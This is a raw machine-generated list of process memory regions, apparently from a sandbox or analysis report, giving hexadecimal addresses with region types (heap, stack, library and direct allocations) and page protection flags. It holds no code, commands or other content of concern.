page read and write
DFC000
stack
page read and write
CB8000
heap
page read and write
2F95000
heap
page read and write
262BBC74000
heap
page read and write
2220000
heap
page read and write
5D00000
heap
page read and write
745000
heap
page read and write
761000
unkown
page read and write
31FE000
trusted library allocation
page read and write
2924000
heap
page read and write
6F0000
heap
page read and write
400000
unkown
page execute and read and write
262C1262000
heap
page read and write
2CEE000
stack
page read and write
33B0000
trusted library allocation
page execute and read and write
421E000
stack
page read and write
1325000
heap
page read and write
5DE000
stack
page read and write
41C6000
trusted library allocation
page read and write
401000
unkown
page execute read
674E000
stack
page read and write
30D3000
trusted library allocation
page read and write
2D1F000
stack
page read and write
5EDC000
heap
page read and write
2E91000
heap
page read and write
2C95000
unkown
page read and write
1DC000
stack
page read and write
3F11000
heap
page read and write
6057000
trusted library allocation
page read and write
24840000
heap
page read and write
42CB000
trusted library allocation
page read and write
6600000
trusted library allocation
page read and write
7F80000
heap
page read and write
5D70000
heap
page read and write
343E000
trusted library allocation
page read and write
F19000
heap
page read and write
7870000
trusted library allocation
page read and write
2A953000
heap
page read and write
2E91000
heap
page read and write
2FC0000
heap
page read and write
2E91000
heap
page read and write
136B000
trusted library allocation
page execute and read and write
1930000
heap
page read and write
300A000
trusted library allocation
page execute and read and write
5E04000
heap
page read and write
61EB7000
direct allocation
page readonly
1350000
trusted library allocation
page read and write
3530000
trusted library allocation
page read and write
CB6000
heap
page read and write
2CAC000
heap
page read and write
2870000
heap
page read and write
69D000
heap
page read and write
7656D7C000
stack
page read and write
2E91000
heap
page read and write
5C3000
heap
page read and write
2E91000
heap
page read and write
1E5FD000
stack
page read and write
43BC000
trusted library allocation
page read and write
2ED0000
remote allocation
page read and write
204B000
stack
page read and write
2924000
heap
page read and write
2BA4000
unkown
page read and write
DFE000
unkown
page readonly
214E000
stack
page read and write
5DB0000
heap
page read and write
354E000
trusted library allocation
page read and write
F18000
heap
page read and write
447E000
heap
page read and write
2484E000
heap
page read and write
4311000
trusted library allocation
page read and write
5E4000
heap
page read and write
16EE000
trusted library allocation
page read and write
4307000
heap
page read and write
6B8000
heap
page read and write
43A4000
trusted library allocation
page read and write
400000
unkown
page readonly
186E000
unkown
page read and write
3210000
trusted library allocation
page read and write
4041000
trusted library allocation
page read and write
1730000
heap
page read and write
262BCCB0000
trusted library section
page readonly
2BA4000
unkown
page read and write
83E0000
trusted library allocation
page read and write
7F0000
heap
page read and write
37B8F000
heap
page read and write
2800000
direct allocation
page read and write
791000
unkown
page execute read
1750000
trusted library allocation
page read and write
686E7000
unkown
page readonly
5F71000
heap
page read and write
2726000
direct allocation
page read and write
ED8000
heap
page read and write
2485B000
heap
page read and write
3154000
trusted library allocation
page read and write
4370000
trusted library allocation
page read and write
2924000
heap
page read and write
EA5000
heap
page read and write
EA3000
heap
page read and write
648A000
trusted library allocation
page read and write
1F1F000
stack
page read and write
328C000
trusted library allocation
page read and write
5DAF000
heap
page read and write
3569000
trusted library allocation
page read and write
E79000
unkown
page write copy
427B000
trusted library allocation
page read and write
6FB000
heap
page read and write
262C1060000
trusted library allocation
page read and write
2E8F000
stack
page read and write
DF5000
unkown
page write copy
12E4000
heap
page read and write
561E000
stack
page read and write
2F85000
heap
page read and write
262BBCFF000
heap
page read and write
2924000
heap
page read and write
280F000
direct allocation
page read and write
CD7000
heap
page read and write
655000
heap
page read and write
3280000
heap
page read and write
262BC55C000
heap
page read and write
4D12000
heap
page read and write
262C120F000
heap
page read and write
2BA4000
unkown
page read and write
262C11E0000
trusted library allocation
page read and write
EC7000
heap
page read and write
56AE000
stack
page read and write
654000
heap
page read and write
338F000
stack
page read and write
76575FE000
stack
page read and write
16DE000
stack
page read and write
421A000
trusted library allocation
page read and write
6462000
trusted library allocation
page read and write
D21000
heap
page read and write
27E6000
heap
page read and write
29E0000
heap
page read and write
A63000
heap
page read and write
68CA2000
unkown
page readonly
2E91000
heap
page read and write
33AB000
trusted library allocation
page read and write
5E6000
heap
page read and write
323F000
stack
page read and write
783000
unkown
page readonly
135A000
trusted library allocation
page execute and read and write
4347000
trusted library allocation
page read and write
5DCA000
heap
page read and write
555000
heap
page read and write
3CB0000
heap
page read and write
EC5000
heap
page read and write
DBE000
stack
page read and write
2CBB000
heap
page read and write
41CD000
heap
page read and write
5DCA000
heap
page read and write
42F000
unkown
page read and write
2924000
heap
page read and write
310E000
stack
page read and write
3347000
heap
page read and write
2485B000
heap
page read and write
2924000
heap
page read and write
37BB7000
heap
page read and write
C60000
unkown
page readonly
2485C000
heap
page read and write
1650000
heap
page read and write
CE5000
heap
page read and write
435B000
heap
page read and write
3025000
unkown
page read and write
6690000
trusted library allocation
page read and write
5D66000
heap
page read and write
CFA000
heap
page read and write
34C9000
trusted library allocation
page read and write
D12000
heap
page read and write
791000
unkown
page execute read
2CAE000
heap
page read and write
2F10000
heap
page read and write
EA4000
heap
page read and write
C70000
heap
page read and write
53A000
stack
page read and write
5DC2000
heap
page read and write
2DD0000
heap
page read and write
2E7F000
unkown
page read and write
44A0000
trusted library allocation
page read and write
2F5C000
stack
page read and write
5DB1000
heap
page read and write
5DCB000
heap
page read and write
1E4FE000
stack
page read and write
105D7000
direct allocation
page read and write
765707E000
unkown
page readonly
14A0000
heap
page read and write
809000
unkown
page read and write
32C0000
heap
page read and write
1790000
heap
page read and write
5C1000
heap
page read and write
2C8B000
heap
page read and write
4161000
trusted library allocation
page read and write
5DAF000
heap
page read and write
2924000
heap
page read and write
2E91000
heap
page read and write
ECB000
heap
page read and write
7657A7E000
unkown
page readonly
37BC1000
heap
page read and write
712E000
stack
page read and write
4345000
trusted library allocation
page read and write
4341000
heap
page read and write
1690000
heap
page read and write
262C12C4000
heap
page read and write
5E02000
heap
page read and write
58CE000
stack
page read and write
2E91000
heap
page read and write
2924000
heap
page read and write
5D78000
heap
page read and write
E70000
unkown
page write copy
2E91000
heap
page read and write
1E671000
heap
page read and write
41AD000
trusted library allocation
page read and write
37BD0000
heap
page read and write
6E70000
heap
page read and write
66B000
heap
page read and write
344A000
trusted library allocation
page read and write
1820000
heap
page read and write
CCB000
heap
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
2924000
heap
page read and write
2E91000
heap
page read and write
E6F000
stack
page read and write
92E000
stack
page read and write
42FA000
heap
page read and write
46B0000
trusted library allocation
page read and write
D7D000
stack
page read and write
EC8000
heap
page read and write
1330000
trusted library allocation
page read and write
1E0BF000
stack
page read and write
5DDF000
heap
page read and write
5DC6000
heap
page read and write
2484E000
heap
page read and write
1620000
heap
page read and write
5E02000
heap
page read and write
19C000
stack
page read and write
262C1250000
heap
page read and write
2E91000
heap
page read and write
217B000
heap
page read and write
31AF000
stack
page read and write
2BA4000
unkown
page read and write
1333000
trusted library allocation
page execute and read and write
262BBAD0000
heap
page read and write
262BC601000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
5E03000
heap
page read and write
26C0000
heap
page read and write
336C000
stack
page read and write
C2C000
stack
page read and write
3443000
trusted library allocation
page read and write
FD0000
heap
page read and write
5E02000
heap
page read and write
2A8BD000
heap
page read and write
5E2E000
stack
page read and write
3F11000
heap
page read and write
5DB4000
heap
page read and write
2BA4000
unkown
page read and write
34D0000
heap
page read and write
CB0000
heap
page read and write
105D7000
direct allocation
page read and write
EA8000
heap
page read and write
3290000
heap
page read and write
2AF7000
stack
page read and write
B1E000
stack
page read and write
6A2000
heap
page read and write
83D0000
trusted library allocation
page read and write
5DBA000
heap
page read and write
3551000
heap
page read and write
E70000
unkown
page read and write
2BA5000
heap
page read and write
31EF000
stack
page read and write
1320000
heap
page read and write
4D1A000
unkown
page read and write
624000
unkown
page read and write
2DEF000
stack
page read and write
13A0000
trusted library allocation
page read and write
DE0000
heap
page read and write
5E10000
heap
page read and write
2924000
heap
page read and write
24840000
heap
page read and write
7890000
trusted library allocation
page read and write
813000
unkown
page readonly
4F49000
trusted library allocation
page read and write
659E000
stack
page read and write
71AD000
stack
page read and write
12E4000
heap
page read and write
50D000
stack
page read and write
5DD2000
heap
page read and write
A1E000
stack
page read and write
262C10E0000
trusted library allocation
page read and write
5D72000
heap
page read and write
5DF000
heap
page read and write
420000
unkown
page read and write
72F0000
trusted library allocation
page read and write
262C1190000
trusted library allocation
page read and write
5D78000
heap
page read and write
34C0000
trusted library allocation
page read and write
C00000
heap
page read and write
4213000
trusted library allocation
page read and write
EA0000
heap
page read and write
484E000
trusted library allocation
page read and write
765767E000
unkown
page readonly
2485C000
heap
page read and write
12DE000
stack
page read and write
2CA0000
heap
page read and write
14A4000
heap
page read and write
83B0000
trusted library allocation
page read and write
447000
unkown
page execute and read and write
7B0000
heap
page read and write
DF5000
unkown
page write copy
276D000
stack
page read and write
7656977000
stack
page read and write
F42000
heap
page read and write
BAE000
stack
page read and write
EB4000
heap
page read and write
2924000
heap
page read and write
68CB1000
unkown
page execute read
3210000
trusted library allocation
page read and write
32C8000
heap
page read and write
2924000
heap
page read and write
262BC51B000
heap
page read and write
5AFE000
stack
page read and write
4FF1000
trusted library allocation
page read and write
CD9000
heap
page read and write
24833000
heap
page read and write
248BF000
heap
page read and write
24830000
heap
page read and write
338F000
stack
page read and write
3547000
trusted library allocation
page read and write
1352000
trusted library allocation
page read and write
426C000
trusted library allocation
page read and write
3230000
heap
page read and write
42DC000
trusted library allocation
page read and write
7656F79000
stack
page read and write
2BA4000
unkown
page read and write
2BA4000
unkown
page read and write
8470000
heap
page read and write
262C121A000
heap
page read and write
233E000
stack
page read and write
880000
heap
page read and write
38D2000
heap
page read and write
726D000
stack
page read and write
422000
unkown
page write copy
6BC000
heap
page read and write
7656C7E000
unkown
page readonly
6D0000
heap
page read and write
34B6000
trusted library allocation
page read and write
24840000
heap
page read and write
CB0000
heap
page read and write
2E91000
heap
page read and write
37B4E000
heap
page read and write
6A00000
heap
page read and write
535000
stack
page read and write
68E4F000
unkown
page readonly
2BA4000
unkown
page read and write
EA1000
heap
page read and write
349A000
trusted library allocation
page read and write
4095000
heap
page execute and read and write
61B0000
trusted library allocation
page read and write
4022000
unkown
page readonly
34B8000
trusted library allocation
page read and write
351F000
stack
page read and write
5D30000
heap
page read and write
5E02000
heap
page read and write
2924000
heap
page read and write
6460000
trusted library allocation
page read and write
5D59000
heap
page read and write
27F2000
direct allocation
page read and write
CAC000
heap
page read and write
2924000
heap
page read and write
5713000
heap
page read and write
2924000
heap
page read and write
15F0000
trusted library allocation
page read and write
4045000
unkown
page readonly
E50000
heap
page read and write
2924000
heap
page read and write
32F7000
heap
page read and write
2B6E000
stack
page read and write
2770000
heap
page read and write
24840000
heap
page read and write
5D78000
heap
page read and write
32C0000
heap
page read and write
68C10000
unkown
page readonly
2485C000
heap
page read and write
791000
unkown
page execute read
700000
heap
page read and write
2C38000
heap
page read and write
2924000
heap
page read and write
59FE000
stack
page read and write
E8B000
heap
page read and write
540000
heap
page read and write
2924000
heap
page read and write
2E00000
heap
page read and write
2C6D000
heap
page read and write
2924000
heap
page read and write
378A000
trusted library allocation
page read and write
444F000
stack
page read and write
5C48000
heap
page read and write
24855000
heap
page read and write
5E02000
heap
page read and write
2E91000
heap
page read and write
F0A000
heap
page read and write
835D000
stack
page read and write
1340000
trusted library allocation
page read and write
424C000
trusted library allocation
page read and write
3250000
heap
page read and write
4014000
heap
page read and write
6EFD000
stack
page read and write
262BBC00000
heap
page read and write
3441000
trusted library allocation
page read and write
32DF000
stack
page read and write
441000
unkown
page read and write
7789000
stack
page read and write
2E91000
heap
page read and write
450000
heap
page read and write
DC0000
heap
page read and write
4B3F000
stack
page read and write
32A0000
heap
page execute and read and write
262BBBD0000
heap
page read and write
380F000
stack
page read and write
2F91000
heap
page read and write
32CE000
stack
page read and write
70AB000
heap
page read and write
34C7000
trusted library allocation
page read and write
4040000
heap
page read and write
2924000
heap
page read and write
35A7000
trusted library allocation
page read and write
1F85000
heap
page read and write
5E50000
heap
page read and write
6200000
trusted library allocation
page read and write
228F000
stack
page read and write
530000
heap
page read and write
2A8CE000
heap
page read and write
80B000
heap
page read and write
2C30000
heap
page read and write
27B8000
direct allocation
page read and write
5E03000
heap
page read and write
262BCC60000
trusted library section
page readonly
262C12F0000
heap
page read and write
EB4000
heap
page read and write
EA9000
heap
page read and write
3030000
trusted library allocation
page read and write
2EBD000
stack
page read and write
83C000
stack
page read and write
5FF000
heap
page read and write
30BF000
stack
page read and write
4382000
trusted library allocation
page read and write
5E07000
heap
page read and write
61E01000
direct allocation
page execute read
33EE000
stack
page read and write
3041000
trusted library allocation
page read and write
F18000
heap
page read and write
2BA4000
unkown
page read and write
7657BFE000
stack
page read and write
3638000
trusted library allocation
page read and write
626000
heap
page read and write
3210000
heap
page read and write
78A0000
trusted library allocation
page read and write
352E000
trusted library allocation
page read and write
2E91000
heap
page read and write
7FE000
stack
page read and write
CEF000
stack
page read and write
68E8E000
unkown
page read and write
7500000
trusted library allocation
page read and write
3270000
heap
page read and write
68E8F000
unkown
page write copy
12E4000
heap
page read and write
31D6000
trusted library allocation
page read and write
2485B000
heap
page read and write
72E000
unkown
page read and write
AA0000
heap
page read and write
2C52000
heap
page read and write
32F3000
heap
page read and write
E01000
unkown
page readonly
5E02000
heap
page read and write
2920000
heap
page read and write
5B3A000
stack
page read and write
3742000
trusted library allocation
page read and write
5E02000
heap
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
730000
unkown
page read and write
7656E7E000
unkown
page readonly
B1E000
stack
page read and write
701C000
heap
page read and write
31CF000
stack
page read and write
2CAE000
heap
page read and write
2924000
heap
page read and write
790000
unkown
page readonly
2E91000
heap
page read and write
2C83000
heap
page read and write
1390000
trusted library allocation
page execute and read and write
3020000
unkown
page read and write
2484F000
heap
page read and write
4277000
trusted library allocation
page read and write
6E0000
heap
page read and write
31D0000
heap
page read and write
3090000
heap
page read and write
490000
heap
page read and write
2483E000
heap
page read and write
586E000
stack
page read and write
83F000
stack
page read and write
2816000
direct allocation
page read and write
2924000
heap
page read and write
353E000
trusted library allocation
page read and write
F1A000
heap
page read and write
13DB000
heap
page read and write
2E91000
heap
page read and write
148A000
heap
page read and write
5DC2000
heap
page read and write
654000
heap
page read and write
5D78000
heap
page read and write
439F000
stack
page read and write
3CCD000
heap
page read and write
5660000
trusted library allocation
page execute and read and write
262BC940000
trusted library allocation
page read and write
5E03000
heap
page read and write
CC0000
heap
page read and write
700C000
heap
page read and write
1730000
heap
page execute and read and write
43E7000
trusted library allocation
page read and write
3242000
trusted library allocation
page read and write
2484E000
heap
page read and write
2E91000
heap
page read and write
262C10B1000
trusted library allocation
page read and write
E0C000
unkown
page readonly
262C1180000
trusted library allocation
page read and write
6610000
trusted library allocation
page read and write
41D0000
heap
page read and write
3290000
heap
page execute and read and write
617000
heap
page read and write
2F8F000
stack
page read and write
299E000
stack
page read and write
2EB0000
heap
page read and write
10F9000
stack
page read and write
2924000
heap
page read and write
5E02000
heap
page read and write
2EBD000
stack
page read and write
690000
heap
page read and write
7491000
heap
page read and write
2C80000
unkown
page read and write
839E000
stack
page read and write
68CC000
stack
page read and write
5EB9000
heap
page read and write
42AC000
trusted library allocation
page read and write
42D4000
heap
page read and write
417000
unkown
page execute read
E8B000
heap
page read and write
4301000
heap
page read and write
1680000
trusted library allocation
page read and write
438D000
trusted library allocation
page read and write
82E0000
trusted library allocation
page execute and read and write
2E91000
heap
page read and write
1334000
trusted library allocation
page read and write
765717C000
stack
page read and write
6170000
trusted library allocation
page read and write
30B8000
heap
page read and write
DFD000
stack
page read and write
33C7000
trusted library allocation
page read and write
275D000
direct allocation
page read and write
3590000
heap
page read and write
327E000
stack
page read and write
2E91000
heap
page read and write
10163000
direct allocation
page read and write
262BC59C000
heap
page read and write
24836000
heap
page read and write
262C1123000
trusted library allocation
page read and write
6A15000
heap
page read and write
3440000
heap
page read and write
D35000
heap
page read and write
4431000
trusted library allocation
page read and write
D0E000
heap
page read and write
2485C000
heap
page read and write
4308000
trusted library allocation
page read and write
31D0000
heap
page read and write
2C40000
heap
page read and write
6A2000
heap
page read and write
12E4000
heap
page read and write
EBE000
heap
page read and write
2E91000
heap
page read and write
34F0000
trusted library allocation
page read and write
690000
heap
page read and write
5FF1000
trusted library allocation
page read and write
840000
heap
page read and write
6C0000
heap
page read and write
53CD000
stack
page read and write
2774000
direct allocation
page read and write
400000
unkown
page readonly
5471000
unkown
page read and write
2924000
heap
page read and write
2BA4000
unkown
page read and write
10001000
direct allocation
page execute read
218E000
stack
page read and write
4252000
trusted library allocation
page read and write
2924000
heap
page read and write
3258000
trusted library allocation
page read and write
2E91000
heap
page read and write
53AB000
trusted library allocation
page read and write
1900000
heap
page read and write
373FC000
stack
page read and write
33B8000
trusted library allocation
page read and write
4060000
heap
page read and write
33EB000
trusted library allocation
page read and write
6760000
trusted library allocation
page execute and read and write
2F90000
trusted library allocation
page read and write
36A3000
trusted library allocation
page read and write
5D6E000
stack
page read and write
41CB000
trusted library allocation
page read and write
2E91000
heap
page read and write
84D0000
heap
page read and write
5DAE000
stack
page read and write
3438000
trusted library allocation
page read and write
2755000
direct allocation
page read and write
193000
stack
page read and write
97000
stack
page read and write
27A7000
stack
page read and write
5E02000
heap
page read and write
2E91000
heap
page read and write
2E91000
heap
page read and write
612E000
stack
page read and write
2484E000
heap
page read and write
4DAE000
stack
page read and write
E8B000
heap
page read and write
2924000
heap
page read and write
2F82000
heap
page read and write
7512000
heap
page read and write
2DCE000
stack
page read and write
5D57000
heap
page read and write
ECC000
heap
page read and write
2F7F000
unkown
page read and write
68C11000
unkown
page execute read
5C5B000
stack
page read and write
76578FE000
stack
page read and write
778000
unkown
page read and write
3553000
trusted library allocation
page read and write
31C4000
heap
page read and write
262C12E6000
heap
page read and write
5C90000
direct allocation
page execute and read and write
5FE000
stack
page read and write
D2F000
heap
page read and write
4293000
trusted library allocation
page read and write
EB4000
heap
page read and write
60EF000
stack
page read and write
2AFD000
stack
page read and write
3214000
trusted library allocation
page read and write
76566FF000
stack
page read and write
262BBCA1000
heap
page read and write
2733000
direct allocation
page read and write
5DCD000
heap
page read and write
341E000
stack
page read and write
42F4000
heap
page read and write
431C000
trusted library allocation
page read and write
262C1030000
trusted library allocation
page read and write
4314000
trusted library allocation
page read and write
42EF000
heap
page read and write
5E02000
heap
page read and write
7820000
trusted library allocation
page read and write
2F75000
heap
page read and write
2924000
heap
page read and write
3297000
heap
page read and write
248CF000
heap
page read and write
35D8000
heap
page read and write
63D000
stack
page read and write
2980000
heap
page read and write
5D5F000
heap
page read and write
33F8000
trusted library allocation
page read and write
6FD000
heap
page read and write
5090000
heap
page read and write
2924000
heap
page read and write
809000
unkown
page write copy
43AE000
trusted library allocation
page read and write
2C69000
heap
page read and write
2BA4000
unkown
page read and write
BDC000
stack
page read and write
5ABA000
stack
page read and write
2707000
heap
page read and write
5D7A000
heap
page read and write
168B000
heap
page read and write
2BA0000
heap
page read and write
2EBF000
stack
page read and write
3270000
heap
page read and write
3732000
trusted library allocation
page read and write
12F0000
heap
page read and write
3015000
trusted library allocation
page execute and read and write
20A0000
trusted library allocation
page read and write
DF4000
unkown
page read and write
760000
heap
page read and write
2924000
heap
page read and write
3420000
heap
page execute and read and write
24833000
heap
page read and write
4206000
trusted library allocation
page read and write
2924000
heap
page read and write
37B02000
heap
page read and write
262C10A0000
trusted library allocation
page read and write
56E0000
heap
page execute and read and write
318B000
trusted library allocation
page read and write
2A80000
heap
page read and write
FD0000
heap
page read and write
14A4000
heap
page read and write
557E000
trusted library allocation
page read and write
41BA000
trusted library allocation
page read and write
342B000
heap
page read and write
6EB000
heap
page read and write
3319000
trusted library allocation
page read and write
12E4000
heap
page read and write
33BD000
trusted library allocation
page read and write
616D000
stack
page read and write
83C0000
trusted library allocation
page execute and read and write
3431000
trusted library allocation
page read and write
431000
unkown
page read and write
3221000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
628000
heap
page read and write
5710000
heap
page read and write
14A4000
heap
page read and write
5E06000
heap
page read and write
2AF5000
heap
page read and write
175B000
trusted library allocation
page read and write
374F0000
heap
page read and write
1740000
trusted library allocation
page read and write
61ED3000
direct allocation
page read and write
24825000
heap
page read and write
24854000
heap
page read and write
49B000
heap
page read and write
2ACD000
heap
page read and write
437D000
trusted library allocation
page read and write
686D9000
unkown
page write copy
61C0000
trusted library allocation
page read and write
16EB000
trusted library allocation
page read and write
133D000
trusted library allocation
page execute and read and write
53B9000
trusted library allocation
page read and write
3445000
trusted library allocation
page read and write
B5F000
stack
page read and write
699000
heap
page read and write
3399000
trusted library allocation
page read and write
E83000
unkown
page readonly
262C10F0000
trusted library allocation
page read and write
30E0000
heap
page read and write
3A40000
heap
page read and write
5DAF000
heap
page read and write
353C000
trusted library allocation
page read and write
3560000
heap
page read and write
1E10E000
stack
page read and write
5DCD000
heap
page read and write
40C000
unkown
page read and write
9CE000
stack
page read and write
540000
heap
page read and write
2E91000
heap
page read and write
EB5000
heap
page read and write
7F90000
trusted library allocation
page read and write
262C11F0000
trusted library allocation
page read and write
5DCF000
heap
page read and write
500000
heap
page read and write
503F000
stack
page read and write
3270000
heap
page readonly
8E0000
heap
page read and write
C78000
heap
page read and write
2ED0000
remote allocation
page read and write
5A7D000
stack
page read and write
262C1325000
heap
page read and write
BEF000
stack
page read and write
5DAF000
heap
page read and write
648F000
trusted library allocation
page read and write
7E3F000
stack
page read and write
42E7000
trusted library allocation
page read and write
4FFE000
stack
page read and write
2924000
heap
page read and write
1619000
trusted library allocation
page read and write
785000
heap
page read and write
13E5000
heap
page read and write
E80000
heap
page read and write
656000
heap
page read and write
E81000
heap
page read and write
262C11B0000
trusted library allocation
page read and write
1365000
trusted library allocation
page execute and read and write
F31000
heap
page read and write
613000
heap
page read and write
5E02000
heap
page read and write
2484E000
heap
page read and write
3644000
trusted library allocation
page read and write
2924000
heap
page read and write
790000
unkown
page readonly
5DCB000
heap
page read and write
2E20000
heap
page read and write
31CC000
trusted library allocation
page read and write
1620000
heap
page read and write
2E91000
heap
page read and write
2E91000
heap
page read and write
343A000
trusted library allocation
page read and write
5DAF000
heap
page read and write
3449000
trusted library allocation
page read and write
7840000
trusted library allocation
page read and write
2483B000
heap
page read and write
DFE000
unkown
page readonly
248BF000
heap
page read and write
2FA0000
heap
page read and write
3490000
heap
page read and write
DFE000
stack
page read and write
262BCB80000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
78CC000
stack
page read and write
5471000
unkown
page read and write
262C134F000
heap
page read and write
68E95000
unkown
page readonly
1F81000
heap
page read and write
2BA4000
unkown
page read and write
24840000
heap
page read and write
7ABE000
stack
page read and write
2F0E000
stack
page read and write
2F78000
heap
page read and write
4263000
trusted library allocation
page read and write
2C83000
heap
page read and write
EB3000
heap
page read and write
37623000
heap
page read and write
57AE000
stack
page read and write
CC7000
heap
page read and write
15EE000
stack
page read and write
3359000
trusted library allocation
page read and write
9B000
stack
page read and write
2E91000
heap
page read and write
2E91000
heap
page read and write
24850000
heap
page read and write
4045000
unkown
page readonly
37B53000
heap
page read and write
754E000
heap
page read and write
27F9000
direct allocation
page read and write
695000
stack
page read and write
323E000
stack
page read and write
2D9E000
stack
page read and write
3426000
trusted library allocation
page read and write
5D40000
heap
page read and write
420000
unkown
page write copy
A60000
heap
page read and write
78D0000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
F42000
heap
page read and write
72AC000
stack
page read and write
765797E000
unkown
page readonly
576E000
stack
page read and write
4242000
trusted library allocation
page read and write
75E000
unkown
page read and write
1F0000
heap
page read and write
4232000
trusted library allocation
page read and write
670000
heap
page read and write
DFF000
unkown
page execute and write copy
790D000
stack
page read and write
2BA4000
unkown
page read and write
5E02000
heap
page read and write
CFF000
heap
page read and write
C1C000
stack
page read and write
5ECA000
heap
page read and write
EDB000
heap
page read and write
2924000
heap
page read and write
2C8D000
stack
page read and write
5EC5000
heap
page read and write
2924000
heap
page read and write
3310000
heap
page read and write
5D5D000
heap
page read and write
2F8F000
heap
page read and write
30AE000
stack
page read and write
5D5D000
heap
page read and write
28DA000
stack
page read and write
262C12E8000
heap
page read and write
262C1302000
heap
page read and write
105D7000
direct allocation
page read and write
4499000
trusted library allocation
page read and write
77CD000
stack
page read and write
170D000
trusted library allocation
page read and write
41C3000
trusted library allocation
page read and write
2924000
heap
page read and write
14A4000
heap
page read and write
1C7B000
heap
page read and write
7100000
trusted library section
page read and write
2FE3000
trusted library allocation
page execute and read and write
75A6000
heap
page read and write
262BCC80000
trusted library section
page readonly
2F7E000
heap
page read and write
3010000
trusted library allocation
page read and write
2924000
heap
page read and write
262BBC7D000
heap
page read and write
ED6000
heap
page read and write
EC7000
heap
page read and write
262C1338000
heap
page read and write
774E000
stack
page read and write
2BA4000
unkown
page read and write
910000
heap
page read and write
5ED4000
heap
page read and write
3240000
trusted library allocation
page read and write
D25000
heap
page read and write
740000
heap
page read and write
68580000
unkown
page readonly
ED8000
heap
page read and write
758E000
heap
page read and write
E83000
unkown
page readonly
43AA000
trusted library allocation
page read and write
2924000
heap
page read and write
3080000
heap
page readonly
34F0000
trusted library allocation
page read and write
5DB5000
heap
page read and write
35B0000
trusted library allocation
page read and write
262C10F0000
trusted library allocation
page read and write
8D0000
heap
page read and write
2924000
heap
page read and write
2924000
heap
page read and write
2F7A000
heap
page read and write
2F7E000
heap
page read and write
65FC000
stack
page read and write
DFB000
unkown
page read and write
2924000
heap
page read and write
262BC415000
heap
page read and write
49D4000
unkown
page read and write
E7C000
unkown
page read and write
53BD000
trusted library allocation
page read and write
5D70000
heap
page read and write
324D000
trusted library allocation
page read and write
1320000
heap
page read and write
445000
unkown
page readonly
262BBC41000
heap
page read and write
664C000
stack
page read and write
4366000
trusted library allocation
page read and write
2E94000
heap
page read and write
5472000
unkown
page read and write
E8D000
heap
page read and write
DF4000
unkown
page read and write
2924000
heap
page read and write
5E02000
heap
page read and write
5DCF000
heap
page read and write
24925000
heap
page read and write
2F82000
heap
page read and write
3415000
heap
page execute and read and write
2784000
direct allocation
page read and write
2FFE000
stack
page read and write
EC7000
heap
page read and write
2C1E000
stack
page read and write
2924000
heap
page read and write
EEE000
heap
page read and write
DFE000
unkown
page readonly
4540000
heap
page read and write
2E91000
heap
page read and write
13B0000
heap
page read and write
67D000
stack
page read and write
83A0000
heap
page read and write
2F82000
heap
page read and write
2A911000
heap
page read and write
3549000
trusted library allocation
page read and write
2B15000
unkown
page read and write
27C6000
direct allocation
page read and write
765747E000
unkown
page readonly
2A8B7000
heap
page read and write
2700000
heap
page read and write
262BC402000
heap
page read and write
342C000
trusted library allocation
page read and write
330E000
stack
page read and write
1367000
trusted library allocation
page execute and read and write
5DAF000
heap
page read and write
DFB000
unkown
page read and write
262C1450000
remote allocation
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
69D000
heap
page read and write
6B1000
heap
page read and write
41B3000
trusted library allocation
page read and write
1670000
trusted library allocation
page read and write
6260000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
5E50000
heap
page read and write
2924000
heap
page read and write
6E60000
heap
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
69CC000
stack
page read and write
C60000
unkown
page readonly
1746000
trusted library allocation
page read and write
2E91000
heap
page read and write
24846000
heap
page read and write
53F2000
trusted library allocation
page read and write
3435000
trusted library allocation
page read and write
2BBE000
stack
page read and write
840000
heap
page read and write
2CAC000
heap
page read and write
102B000
stack
page read and write
790000
unkown
page readonly
1903000
heap
page read and write
286B000
heap
page read and write
1600000
trusted library allocation
page read and write
2485C000
heap
page read and write
262C1090000
trusted library allocation
page read and write
13B8000
heap
page read and write
332A000
trusted library allocation
page read and write
ECB000
heap
page read and write
2924000
heap
page read and write
32EE000
stack
page read and write
5DB2000
heap
page read and write
1F80000
heap
page read and write
27D5000
direct allocation
page read and write
171E000
heap
page read and write
520000
heap
page read and write
809000
unkown
page write copy
5E02000
heap
page read and write
2924000
heap
page read and write
DFE000
unkown
page readonly
5DBC000
heap
page read and write
24854000
heap
page read and write
7FA0000
trusted library allocation
page execute and read and write
262BC51B000
heap
page read and write
61EB4000
direct allocation
page read and write
24846000
heap
page read and write
400000
unkown
page readonly
192F000
stack
page read and write
5DBD000
heap
page read and write
42D2000
trusted library allocation
page read and write
40A000
unkown
page read and write
2924000
heap
page read and write
3100000
trusted library allocation
page read and write
1356000
trusted library allocation
page execute and read and write
E4E000
stack
page read and write
2924000
heap
page read and write
34DE000
stack
page read and write
4351000
trusted library allocation
page read and write
51E9000
direct allocation
page read and write
5470000
unkown
page read and write
2924000
heap
page read and write
4321000
trusted library allocation
page read and write
56B0000
trusted library allocation
page read and write
5C30000
heap
page read and write
44DF000
stack
page read and write
5DBE000
heap
page read and write
42D7000
trusted library allocation
page read and write
3F10000
heap
page read and write
2BA4000
unkown
page read and write
608000
heap
page read and write
5DB9000
heap
page read and write
262BBC91000
heap
page read and write
4AFE000
stack
page read and write
70EE000
stack
page read and write
2CB2000
heap
page read and write
5E61000
heap
page read and write
13B0000
heap
page read and write
15BF000
stack
page read and write
217F000
heap
page read and write
426E000
trusted library allocation
page read and write
24854000
heap
page read and write
6330000
heap
page read and write
C80000
heap
page read and write
38C6000
trusted library allocation
page read and write
2E91000
heap
page read and write
2924000
heap
page read and write
5DCA000
heap
page read and write
2484E000
heap
page read and write
2E91000
heap
page read and write
C60000
unkown
page readonly
5DB4000
heap
page read and write
262BBD02000
heap
page read and write
429F000
trusted library allocation
page read and write
35F6000
trusted library allocation
page read and write
2485B000
heap
page read and write
37B94000
heap
page read and write
3285000
trusted library allocation
page read and write
4371000
trusted library allocation
page read and write
EDB000
heap
page read and write
2E91000
heap
page read and write
809000
unkown
page read and write
3200000
heap
page read and write
42FE000
trusted library allocation
page read and write
6660000
trusted library allocation
page execute and read and write
5CB000
heap
page read and write
2E91000
heap
page read and write
274E000
direct allocation
